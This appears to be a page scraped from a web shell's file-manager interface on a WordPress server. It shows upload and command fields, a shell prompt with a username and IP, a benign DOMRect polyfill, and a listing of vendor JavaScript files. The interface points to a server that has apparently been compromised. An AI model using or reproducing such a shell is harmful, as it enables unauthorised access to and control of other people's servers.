[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.139.86.53: ~ $
// DOMRect
(function (global) {
	function number(v) {
		return v === undefined ? 0 : Number(v);
	}

	function different(u, v) {
		return u !== v && !(isNaN(u) && isNaN(v));
	}

	function DOMRect(xArg, yArg, wArg, hArg) {
		var x, y, width, height, left, right, top, bottom;

		x = number(xArg);
		y = number(yArg);
		width = number(wArg);
		height = number(hArg);

		Object.defineProperties(this, {
			x: {
				get: function () { return x; },
				set: function (newX) {
					if (different(x, newX)) {
						x = newX;
						left = right = undefined;
					}
				},
				enumerable: true
			},
			y: {
				get: function () { return y; },
				set: function (newY) {
					if (different(y, newY)) {
						y = newY;
						top = bottom = undefined;
					}
				},
				enumerable: true
			},
			width: {
				get: function () { return width; },
				set: function (newWidth) {
					if (different(width, newWidth)) {
						width = newWidth;
						left = right = undefined;
					}
				},
				enumerable: true
			},
			height: {
				get: function () { return height; },
				set: function (newHeight) {
					if (different(height, newHeight)) {
						height = newHeight;
						top = bottom = undefined;
					}
				},
				enumerable: true
			},
			left: {
				get: function () {
					if (left === undefined) {
						left = x + Math.min(0, width);
					}
					return left;
				},
				enumerable: true
			},
			right: {
				get: function () {
					if (right === undefined) {
						right = x + Math.max(0, width);
					}
					return right;
				},
				enumerable: true
			},
			top: {
				get: function () {
					if (top === undefined) {
						top = y + Math.min(0, height);
					}
					return top;
				},
				enumerable: true
			},
			bottom: {
				get: function () {
					if (bottom === undefined) {
						bottom = y + Math.max(0, height);
					}
					return bottom;
				},
				enumerable: true
			}
		});
	}

	global.DOMRect = DOMRect;
}(self));

Filemanager

Name Type Size Permission Actions
lodash.js File 531.35 KB 0644
lodash.min.js File 69.05 KB 0644
moment.js File 172.3 KB 0644
moment.min.js File 57.43 KB 0644
react-dom.js File 1.03 MB 0644
react-dom.min.js File 126.32 KB 0644
react-jsx-runtime.js File 46.17 KB 0644
react-jsx-runtime.min.js File 900 B 0644
react-jsx-runtime.min.js.LICENSE.txt File 249 B 0644
react.js File 107.35 KB 0644
react.min.js File 10.38 KB 0644
regenerator-runtime.js File 24.71 KB 0644
regenerator-runtime.min.js File 6.47 KB 0644
wp-polyfill-dom-rect.js File 1.88 KB 0644
wp-polyfill-dom-rect.min.js File 865 B 0644
wp-polyfill-element-closest.js File 428 B 0644
wp-polyfill-element-closest.min.js File 426 B 0644
wp-polyfill-fetch.js File 19.35 KB 0644
wp-polyfill-fetch.min.js File 9.81 KB 0644
wp-polyfill-formdata.js File 11.6 KB 0644
wp-polyfill-formdata.min.js File 8.57 KB 0644
wp-polyfill-inert.js File 29.51 KB 0644
wp-polyfill-inert.min.js File 8.02 KB 0644
wp-polyfill-node-contains.js File 643 B 0644
wp-polyfill-node-contains.min.js File 353 B 0644
wp-polyfill-object-fit.js File 8.97 KB 0644
wp-polyfill-object-fit.min.js File 2.91 KB 0644
wp-polyfill-url.js File 107.75 KB 0644
wp-polyfill-url.min.js File 45.97 KB 0644
wp-polyfill.js File 122.96 KB 0644
wp-polyfill.min.js File 37.04 KB 0644